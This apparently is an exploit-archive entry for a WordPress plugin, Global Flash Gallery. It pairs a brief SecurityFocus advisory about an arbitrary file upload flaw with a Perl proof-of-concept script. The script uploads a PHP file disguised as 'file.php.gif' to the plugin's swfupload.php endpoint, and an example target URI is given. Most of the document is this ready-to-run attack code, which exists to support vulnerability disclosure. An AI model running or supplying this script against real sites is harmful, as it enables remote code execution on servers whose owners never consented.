32 lines
No EOL
1 KiB
Text
32 lines
No EOL
1 KiB
Text
source: https://www.securityfocus.com/bid/65060/info
|
|
|
|
The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
|
|
|
|
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
|
|
|
|
#! /usr/bin/perl
|
|
use LWP;
|
|
use HTTP::Request::Common;
|
|
|
|
my ($url, $file) = @ARGV;
|
|
|
|
my $ua = LWP::UserAgent->new();
|
|
my $req = POST $url,
|
|
Content_Type => 'form-data',
|
|
Content => [
|
|
name => $name,
|
|
galleryselect => 1, # Gallery ID (popup.php)
|
|
Filedata => [ "$file", "file.php.gif", Content_Type =>
|
|
'image/gif' ]
|
|
];
|
|
my $res = $ua->request( $req );
|
|
if( $res->is_success ) {
|
|
print $res->content;
|
|
} else {
|
|
print $res->status_line, "\n";
|
|
}
|
|
|
|
--------------------
|
|
Example URI:
|
|
--------------------
|
|
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php |